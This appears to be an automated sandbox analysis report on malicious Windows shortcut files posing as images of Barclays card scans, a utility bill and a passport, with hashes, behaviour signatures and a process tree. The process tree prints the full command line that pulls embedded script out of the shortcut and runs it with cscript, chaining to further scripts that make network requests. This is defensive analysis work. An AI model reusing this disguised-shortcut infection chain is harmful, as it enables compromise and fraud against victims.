Overview
overview
10Static
static
Barclays C...pg.lnk
windows7_x64
10Barclays C...pg.lnk
windows10-2004_x64
10Barclays C...pg.lnk
windows7_x64
10Barclays C...pg.lnk
windows10-2004_x64
10Barclays U...pg.lnk
windows7_x64
10Barclays U...pg.lnk
windows10-2004_x64
10Personal P...pg.lnk
windows7_x64
10Personal P...pg.lnk
windows10-2004_x64
10Analysis
-
max time kernel
153s -
max time network
175s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
04-02-2022 08:41
Static task
static1
Behavioral task
behavioral1
Sample
Barclays CC Back.jpg.lnk
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
Barclays CC Back.jpg.lnk
Resource
win10v2004-en-20220112
Behavioral task
behavioral3
Sample
Barclays CC Front.jpg.lnk
Resource
win7-en-20211208
Behavioral task
behavioral4
Sample
Barclays CC Front.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral5
Sample
Barclays Utility.jpg.lnk
Resource
win7-en-20211208
Behavioral task
behavioral6
Sample
Barclays Utility.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral7
Sample
Personal Passport.jpg.lnk
Resource
win7-en-20211208
Behavioral task
behavioral8
Sample
Personal Passport.jpg.lnk
Resource
win10v2004-en-20220112
General
-
Target
Barclays CC Back.jpg.lnk
-
Size
83KB
-
MD5
85b2d96080c853c686f0b7b7284896a8
-
SHA1
db50fc4ea4f6c13fdbcd28ebe2f1cc44a74a83bf
-
SHA256
24f7995ebb2eeb1b122232fda871acaa0eff9ba52f5dbe5423a0809c5b3d824e
-
SHA512
9d419fb9406456937e92d57fc1b21f62cac1838082f6059924630edbefb5b568348553658565d59796d97b6078b28827abdb8c3c6eddb36800d0c78dcceff791
Malware Config
Signatures
-
Blocklisted process makes network request 18 IoCs
flow pid Process 3 1428 cscript.exe 4 1428 cscript.exe 8 1428 cscript.exe 9 1428 cscript.exe 10 1428 cscript.exe 11 1428 cscript.exe 13 1428 cscript.exe 14 1428 cscript.exe 15 1428 cscript.exe 16 1428 cscript.exe 17 1428 cscript.exe 19 1428 cscript.exe 20 1428 cscript.exe 21 1428 cscript.exe 22 1428 cscript.exe 23 1428 cscript.exe 24 1428 cscript.exe 25 1428 cscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: RenamesItself 1 IoCs
pid Process 948 cmd.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 1396 wrote to memory of 948 1396 cmd.exe 28 PID 1396 wrote to memory of 948 1396 cmd.exe 28 PID 1396 wrote to memory of 948 1396 cmd.exe 28 PID 948 wrote to memory of 968 948 cmd.exe 29 PID 948 wrote to memory of 968 948 cmd.exe 29 PID 948 wrote to memory of 968 948 cmd.exe 29 PID 968 wrote to memory of 1704 968 forfiles.exe 30 PID 968 wrote to memory of 1704 968 forfiles.exe 30 PID 968 wrote to memory of 1704 968 forfiles.exe 30 PID 968 wrote to memory of 1664 968 forfiles.exe 31 PID 968 wrote to memory of 1664 968 forfiles.exe 31 PID 968 wrote to memory of 1664 968 forfiles.exe 31 PID 948 wrote to memory of 736 948 cmd.exe 32 PID 948 wrote to memory of 736 948 cmd.exe 32 PID 948 wrote to memory of 736 948 cmd.exe 32 PID 948 wrote to memory of 748 948 cmd.exe 33 PID 948 wrote to memory of 748 948 cmd.exe 33 PID 948 wrote to memory of 748 948 cmd.exe 33 PID 948 wrote to memory of 804 948 cmd.exe 34 PID 948 wrote to memory of 804 948 cmd.exe 34 PID 948 wrote to memory of 804 948 cmd.exe 34 PID 948 wrote to memory of 956 948 cmd.exe 35 PID 948 wrote to memory of 956 948 cmd.exe 35 PID 948 wrote to memory of 956 948 cmd.exe 35 PID 956 wrote to memory of 1760 956 cscript.exe 37 PID 956 wrote to memory of 1760 956 cscript.exe 37 PID 956 wrote to memory of 1760 956 cscript.exe 37 PID 1760 wrote to memory of 1428 1760 cscript.exe 39 PID 1760 wrote to memory of 1428 1760 cscript.exe 39 PID 1760 wrote to memory of 1428 1760 cscript.exe 39
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Barclays CC Back.jpg.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Barclays CC Back.jpg*lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Barc*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "RDE3">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cScrIPt "C:\Users\Admin\AppData\Local\Temp\0.js"2⤵
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Windows\system32\forfiles.exeforfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Barc*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"3⤵
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\system32\cmd.exe/c move "C:\Users\Admin\AppData\Local\Temp\Barclays CC Front.jpg.lnk" C:\Users\Admin\AppData\Local\Temp\1.lnk4⤵PID:1704
-
-
C:\Windows\system32\cmd.exe/c move "C:\Users\Admin\AppData\Local\Temp\Barclays Utility.jpg.lnk" C:\Users\Admin\AppData\Local\Temp\1.lnk4⤵PID:1664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""3⤵PID:736
-
-
C:\Windows\system32\find.exefind "RDE3"3⤵PID:748
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" rd a"3⤵PID:804
-
-
C:\Windows\system32\cscript.execScrIPt "C:\Users\Admin\AppData\Local\Temp\0.js"3⤵
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\System32\cscript.exe"C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.js4⤵
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\System32\cscript.exe"C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Local\Temp\reportapi.js5⤵
- Blocklisted process makes network request
PID:1428
-
-
-
-